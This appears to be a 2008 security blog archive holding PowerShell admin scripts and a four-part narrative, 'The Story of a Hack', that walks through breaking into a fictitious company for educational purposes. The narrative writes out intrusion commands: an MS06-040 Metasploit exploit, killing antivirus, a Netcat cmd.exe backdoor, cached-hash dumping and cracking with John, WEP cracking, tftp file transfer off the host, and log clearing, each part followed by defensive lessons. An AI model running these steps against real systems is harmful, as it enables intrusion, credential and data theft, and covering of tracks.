Thursday, November 27, 2008

PowerShell - Finding New User Accounts

Managing user accounts in a large company can sometimes be quite difficult. Keeping track of newly created accounts, or accounts created between a certain time period is not only useful from an administrative point of view but also from a security aspect too. Being able to identify accounts that may have been created during a period of possible comprimise is extremely useful.

The PowerShell script below (Get-NewAccount) will ask for 2 dates and then list all accounts created between those dates.

#This script will list new accounts and then count them.

$days = (read-host "How many days back shall I go?")
Write-host "This script will display all accounts created in the past $days days. Please wait a few minutes" -fore yellow
$date = get-date
$date = $date.AddDays(-$days)
write-host " "
$TotalAccountsCreated = Get-QADUser -SizeLimit 0 | where {$_.whenCreated -ge $date} | select Name,Company
write-host " "
Write-host "There have been" $totalaccountscreated.count "accounts created in the past $days days" -fore red

Thanks to the guys at PowerShell Community who helped me with this.

Sunday, November 16, 2008

The Story of a Hack - Part 3. Kung Fu Shopping

Once again, this is just my little story about how some data may be stolen from a network following a penetration. This post is supposed to be educational and should demonstrate that these types on attacks are not rocket science that can be pulled of by an elite few. This post isn't really Kung Fu, I'll leave that to the brilliant Mr Skoudis. This is just a few DOS commands that show that you can get what you want without having to get a VNC of RDP session.

If you missed the intro, part one or part two you can get them here, here and here. These parts along with this one put together the story of my little hack. I hope you enjoy.

Kung Fu Shopping

Right, so I got on the LAN and I’ve had a little look around. Obviously I’m a lazy git so I’ll go for what I think will be the low hanging fruit, the Test Server. Names can give away so much. Often these are the servers that are just thrown onto a network and are maybe excluded from policies, they are not business critical and only used for testing so they are not patched because after all who’s gonna hack a test box eh? Well I am because that’s the type of box I like.

First I’m going to get a shell on the box with my trusty Metasploit. I saw from my scans that this is a Windows 2003 box with no service pack. I’ll therefore use the most reliable exploit I have MS06-040 (thank you Microsoft). There are newer exploits that could be used but this is a reliable favourite.

After gaining root (okay System) on the box I like to carefully and quietly look around to get a feel for where I am.

First things first, I want to stop any AV that might be running. So i'll just have a quick look for it.

Net Start

I hoped to see a service running, but nothing. Hmmm.. lets look at the tasks.


Oh, there it is. AVScanner.exe, never heard of that one before. I’ll kill it just to be sure. I don’t want anything messing with any tools I need to upload.

Taskkill /PID 1548

Before I continue it’s handy to get myself a backdoor just encase I drop the Metasploit session. I’ll use Netcat for this. I copy it up to the temp folder, then start a listener on another port.

tftp –i get nc.exe

nc –L –e cmd.exe –p 33333

Okay, now I connect to my backdoor.

nc 33333

Cool. Now I want to get myself another session on the go and get the fantastic Meterpreter going.

Right, I want to dump out anything that needs cracking first so it can be cracked whilst I poke about. Meterpreter lets dump the local hashes.


Now that’s all well and good, these are nice to have but I really need so domain credentials. For this I’ll use Cachedump.


Ohh, nice. I got me 2 domain user hashes. No admin but that’s okay. I’ll throw these through John with a good wordlist and carry on.

john --wordlist=pwlist.lst --format=mscash cc.txt

One thing I realise is that these are going to be cracked and come back in uppercase so ideally I want to know the password policy so I don’t start locking people out.

Net accounts

There we go, nice relaxed password policies. No biscuit for Bad Admin!

Right, lets get a bit of info on the host and the network. As I go through these commands I like to pipe them out to a file and then periodically copy the file over to my box. This way I have a load more valuable information if I need to re-enter the network at a later time. I still have my nmap scans from earlier, I'll only get rid of stuff after I have what I came for.

So I get the useful network stuff:

Ipconfig /all

arp -a

Ipconfig /displaydns

This gives me the IP info and lets me know who this box has been talking to recently.

I also want to know what about the other hosts on the domain.

Net view

Right, so there’s the file server. I guess the stuff I want is going to be on there. Hang on, lets not be too hasty. I need to have a look around here first. What else have I got on this box? I'll just rip through the directories with tree then TFTP the file upto my box for easier analysis.

tree c:\ /f /a >filelist.txt

tftp put filelist.txt

Look at that, a backup database file. I’ll have that. I just love the way that people make copies of data and protect those copies so much less than they do the originals.

And some very useful SysInternal tools. Good Admin, you can have that biscuit after all.

So are there any other databases I’ve missed? After all Tree wont pick up hidden files.

Dir /s /h:a *.*

Oh, would you believe it, a hidden password file. It just goes to show what goodies you might find.

type db-pass.txt

Right, lets crack on, the pub opens soon. What am I here for? Accounts database and Customer database. Well they might be in the backup, but I don’t want to take the chance.

Do I have any mapped drives to the server?

Net use

No mapped drives, well lets get one on. First what do I want to map to?

Net view \\File-Server

I can see a data share, I’ll map to that and hopefully be able to grab my data and get out of here.

Net use * \\file-server\data

Tree/f /a

Right, well it seems that the folders are locked down with ACL’s.

John has finished on the wordlist so I’ll see what we have. Well I have one account cracked. Hopefully that’ll do the trick.

Net use * \\File-Server\Data Screwy0u /U:lee

Right I can get into Customer Care and after a second or two I get my customer database.

And it's gone! i should have been a magician!

That’s no good. I’m locked out of Accounts though through even more NTFS permissions. I think I need to kick John up the arse and get these passwords cracked. I throw a bigger dictionary at him and enable the rules.

john --wordlist=bigpwlist.lst --rules --format=mscash cc2.txt

Right, now I got a BackupSVC account. Well if my memory serves me well, my recon found that HackMe was listed as a customer of Backup Service, the outsourcing company. Let’s see what groups this account is in, I guess if they are gonna have a support account it's gonna have some decent privileges right?

Net group “accounts” /domain

Net group “domain admins” /domain

Only Maria is in the accounts group, but I did get an account in Domain Admins. Although I can’t see if Domain Admins is a member of Accounts, if not I can always use PWDump to grab AD and then crack Maria’s password.

Right now I’ll just remap my drive with the good old BackupSVC account, hopefully grab my data and be on my merry way.

So. I have my data. I need to do some tidying up. I’ll overwrite and rename the tools I uploaded before deleting them. I also want to remove any shares I created. I know that I would have left some traces but i'll feel a little better about myself after tidying up. i might also use the Time command to make things slightly more interesting for Mr Admin.

And finally I’ll use the handy tools that I found on the test box to delete the logs on the File Server and the Demo Server.

Psloglist \\file-server –u hackme\BackupSVC –p Support01 –c System Psloglist \\file-server –u hackme\BackupSVC –p Support01 –c Application Psloglist \\file-server –u hackme\BackupSVC –p Support01 –c Security

Right, I’ve got what I wanted, and now I’m outta here.


  • First lesson, Patch. Patch everything, and once you have finished patching, patch some more.
  • Passwords. A good strong password policy that requires passwords to be complex and changed regularly. Also a password audit passwords would have picked up a very weak password on a privileged account such as BackupSVC
  • Good account policies should be enforced, locking accounts until they are required.
  • Enforce NTFS permissions to lock down access to files, giving access to only those that really need access.
  • Good AV software could have prevented some of the tools I uploaded from working, yes I may have been able to modify these tools but it makes the task of the attacker that much harder.
  • Check logs regularly and have an incident response plan to deal with a security breach.
That's about it really, there probably are loads more steps that can be done such as employing HIDs and HIPs but i'm not really all that well up on those yet.

Thanks for reading.

Friday, November 14, 2008

The Story of a Hack - Part 2. Breaking In

Just a reminder, this series of post, like all my posts, is for educational purposes. Mostly my education but if anyone else finds them interesting or useful then that's great too.

This is the second part of my little hacking story. The intro can be read here, and the first part here.

I do not condone breaking into networks without permission, the methods I describe here are how I envisage a network might be penetrated by a determined attacker, I could be completely wrong.

Okay, that said lets get on with it.

Breaking In

So I had a little recce of the target and performed a very inconspicuous war-walk with my IPhone. Knowing that HackMe uses WEP on the wireless network and broadcasts the SSID as HackMe speaks volumes of the security stance of the company in general.

So I sit myself in the park opposite the premises on this lovely day along with quite a few other people, all making the most of the warm weather and wanting to get out of the offices. Booting straight into my favourite security distro BackTrack I put my black hat on for a little wireless fun.

To start with I launch kismet, specifying the capture source and with logging turned off.

kismet -c madwifi_ag,wifi0,madwifi -n

Great, I can see the HackMe wireless network and by simply pressing "i" I can get the MAC address of the access point and I make a note of the channel, I'll need these in SpoonWEP.

I fire up the SpoonWEP tool that's included with BackTrack, configure it to point to the WAP, adjust the channel and tell it to use my wireless interface. 2 minutes later and I'm a very happy hacker.

My next step is to associate to the target network with the cracked WEP key and spend a few minutes exploring.

I'll just fire off a few Nmap commands to get an idea of what my targets network looks like. At this stage I don't know if I'm on the internal network or just on a wireless subnet.

Before long it seems as though I am indeed in the internal LAN. I can see a few other hosts that would only usually live on the LAN. This makes life easier, and that's exactly what I want, an easy life.

nmap -sP

nmap -A

oh.... there we go. Test-Server. That's what we like.

Hopefully Test-Server is one of those poor servers that gets sat in the corner and forgotten about. We all know the ones I'm talking about. Don't worry Bad Admin, Bob will give it some attention for you!

  • In my opinion it's a real bad idea to have a wireless network coming straight onto your LAN. It should be firewalled off and should employ strong certificate based authentication.
  • As I pointed out in the previous post, a number of measures can be taken to secure wireless networks, and although these layers of security can be peeled away, each layer raise the bar slightly and makes the attackers job harder.
  • Every host on a network is important, as an attacker there are two thing I count on to be able to break into a network, poorly patched hosts and human stupidity, and these are both one in the same!

Next............Kung Fu Shopping.

Thursday, November 6, 2008

The Story of a Hack - Part 1. Reconaisance

If you haven't read the Intro, it might help if you check out that post.

First things first, recon. I want to find out as much information about my target as possible. Some attackers might go straight to scanning IP's , not me, I want to do as little of that as possible at the moment. I start with the best tool I have available for recon, Google!

I scour the targets website. It’s a small and basic website but I get an email address, a flyer in PDF format and a list of office locations and contact details. Well that’s a start. The website is very 1.0, simple and secure I guess.

So the email address I got off the website is a generic mailbox that many organisations create, Well let me I throw the domain name into Google and get a few results.


Okay, So I get a few results.

What is interesting is came up in a SQL Server forum asking a question about MS SQL 2000 Server configuration.

I also use Google to see which sites are linking to HackMe Ltd.

Of the links I get returned the most useful one is from an outsourcing support company called BackupService. They provide small companies with Remote Support and have HackMe Ltd listed as a customer. Interesting, that puts them in scope as a possible attack vector.

Now I turn to the PDF file on the website. I run this through to look at the metadata.

FileType(guessed) = PDF document, version 1.4
format - PDF 1.4 mimetype - application/pdf MIMEType = application/pdf
CreateDate = 2008:04:01 03:39:33
PDFVersion = 1.4 FileType = PDF Creator = PrimoPDF
Title = Microsoft Powerpoint Sales Brochure [Compatibility Mode]
ModifyDate = 2008:04:01 03:39:33

PageCount = 9

FileSize = 243 kB

Producer = PrimoPDF
Author = Lena Bloggs

Okay, after a quick Google, I see PrimoPDF is not vulnerable. But I have got another employee name, Lena Bloggs, and I know that my target uses Microsoft Office internally, so there probably using IE and Outlook too. Mmm, loads of possibilities there for some targeted sploits.

Let's see what I get with a quick bounce email.

I send an email to and have a look at my returned headers.

Delivered-To: Received: from ( Received-SPF: pass ( best guess record for domain of designates as permitted sender) client-ip=; as permitted sender) smtp.mail= X-VirusChecked: Checked X-Msg-Ref:!1225463335!6552390!18
X-StarScan-Version:;,-,- X-Originating-IP: [] Received: from unknown (HELO ( From: To: boundary="" X-DSNContext: 335a7efd - 4523 - 00000001 - 8004546 Message-ID: Subject: Delivery Status Notification (Failure) This is an automatically generated Delivery Status Notification. Delivery to the following recipients failed.

Okay, from my bounce email I get to find out that my target is filtering email for spam and viruses, bugger. That reduces my chances of getting some of my attachments through. I do get the name of an internal server though. I also get some IP addresses.

This is all useful information that will help me decide which attack avenue will be most successful.

Now what have they got on the Internet, I know that they have a web presence and an email server so let’s look at DNS. First I do a Whois to see what that turns up.

So this gives me company and address info, and I also get to see who they use for the Name servers. Nothing too exciting.

Now DNS, For this I will use a couple of tools. Fierce Domain scanner is a favourite of mine, and has served me well before.

perl -dns

This has given me 2 Address blocks. One which will be the hosted website (, and the other looks like the address block they use for there own servers I'll focus on that block. What I really want to know is how big is the range the use and are there any other hosts accessible.

I use nmap to look for typical edge devices on that class C range.

nmap -sP

This gives me what i suspect is the range they are using. with .32 being the network address and .47 being the broadcast.

Now I check the webmail host I found and find that as I expected only port 443 is open.

nmap -F PN

And then I confirm that IIS is in use.

nmap -PN -p443 -sV

So now I find that they are using Microsoft IIS as suspected.

But Fierce didn't give me a mail server. Well, luckily I get that IP from my email bounce ( remember.

After applying some nmap magic dust, I get some very interesting info back. It looks as though my target is using a Cisco pix firewall and they are probably NAT'ing through it to the internal hosts. Again, knowing this will help me shape my attack.

I'll also quickly Dig the MX to verify my bounce email.

dig -t mx

The results confirm what the bounce email found. HackMe is using MessageLabs for mail filtering. Buggers!

Okay, maybe I’ll stretch my legs and go for a little drive. But first I do a quick Google Map of where I'm heading.

Nice, there's a big park right outside my targets office and plenty of streets to park on.

So I stop by the targets office which is in a built up area with plenty of other small businesses around. I can park quite close to the premises and if my IPhone serves me well I see that they have a lovely wireless network going on.

WEP, you are the weakest link, goodbye!

So what have I got from my recon?

External IP Addresses

  • - mail
  • - webmail

Wireless Network

  • HackMe- WEP Encryption



Internal Host Names

  • File-Server

Software in Use

  • MS Office
  • MS IIS
  • PrimoPDF
  • MS Exchange
  • Windows XP
  • Windows 2003 Server
  • MS SQL (maybe)

Other Useful Info

  • Cisco Pix Firewall in use
  • Using MessageLabs for email scanning
  • External Support through BackupService Ltd
  • Head Office is 20 minutes drive.

Not bad for a couple of hours work. This should be fun.

OK, so my attack vectors:

Client side exploits:
I know what software they are using internally so this is certainly a possibility. But I also know that they are filtering mail with a pretty good filtering service so that's not good.

Social Engineering:
I know who HackMe uses for Support, and I know quite a lot about the software they use, the names of HackMe employee's, and the infrastructure they have. This is certainly a good attack vector.

Bruteforce Webmail:
I know that they have an accessible webmail server, and I have some information to make an attempt at bruteforcing a login. I don't have enough info at this point and this would be pretty messy and unlikely to succeed.

Wireless Penetration:
Knowing they use WEP, have named the AP as HackMe and have not hidden the SSID, this tells me a great deal about the security of HackMe. This will be my preferred attack vector.

Lessons Learned

Okay, So what could HackMe Ltd have done to make the attackers life more difficult.

  • Don’t use WEP. It's very broke. Hide SSID's and apply MAC Address filtering.
  • Strip Metadata from documents.
  • Strip Email headers.
  • Minimise Information disclosed by third parties.
  • Don’t post questions to tech forums from a company email addresses that disclose information about your infrastructure.

Coming up........Breaking in and Kung Fu Shopping.

The Story of a Hack - Introduction

Over the next few posts throughout November I’ll be doing something slightly different. I’ll be demonstrating the penetration into a fictitious company called HackMe Ltd.

The goal of this series of posts is to demonstrate how simple it is to penetrate a network, steal some data, and then erase the evidence of the intrusion. I’ll also be including details of what measures could have been taken to prevent or detect the attack. I want to keep things simple but still as realistic as possible.

Throughout the story I’ll be using common & simple techniques to footprint, scan and penetrate my target. After gaining access to the target, where at all possible I want to just use the native tools on the compromised systems to find and retrieve my data.

These set of posts are written to educate the reader, and hopefully increase security awareness.

Setting the Scene

So I’ve been given my Target. HackMe Ltd is a popular hobbyist magazine distribution company. My job is to steal the customer database and the accounts database. I must find a way in, get the data and get out, leaving as little evidence as possible.

Part 1 - Reconaisance

Part 2 - Breaking In

Part 3 - Kung Fu Shopping

I hope anyone reading this enjoys these posts and I welcome comments and feedback.

Saturday, November 1, 2008

Poor Mans Patching with PSExec & Powershell

With the release of such a critical patch as MS08-067 it seems that us "patchers" are up against it. Well this post is just really to detail an alternative method of deploying patches using PSExec and PowerShell.


  • PSExec
  • PowerShell (with Quest AD Cmdlets installed)

1. OK, so first you need to create a share that all the servers can see. Once done download the patch (or patches) and copy them to the share.

2. Now you need a list of all your servers if you dont have one. I would use PowerShell for this.

get-qadobject -sizelimit 0 -type computer | where {$_.osname -match "server"} | select name > c:\servers.txt

Tidy up the text file by removing the header field (Name) manually.

3. Now use PSExec to deploy the patch from the share to the servers listed in the file.

psexec @serverlist.txt -c "\\File-Server\SecurityPatches$\MS08-067.exe /quiet /norestart /overwriteoem"

If you have many patches to install you could place the line above into a batch file and simply change the name of the patch on each line.

4. Use PowerShell to reboot all the server in the list if required. The following PowerShell one-liner will do that.

gc c:\servers.txt | ForEach-Object { gwmi win32_operatingsystem -ComputerName $_ | ForEach-Object { $_.reboot() }}

5. Finally, Use PowerShell to check that the patches have been deployed successfully. The following script will prompt you for your server list file and the HotFix ID you want to check for.

function Get-HotFix($server,$hotFixID) {
$results = gwmi win32_quickfixengineering -computer $_ -filter "HotFixID='$hotFixID'"
if ($results) {
$results | select CSName,HotFixID,@{n="Installed";e={"Yes"}}
} else {
$results = "" | select CSName,HotFixID,Installed
gc (Read-Host "Please provide path to server list file") | Get-HotFix -hotFixID (Read-Host "Hotfix ID") | ft -auto

Or you could use WSUS or SMS I guess.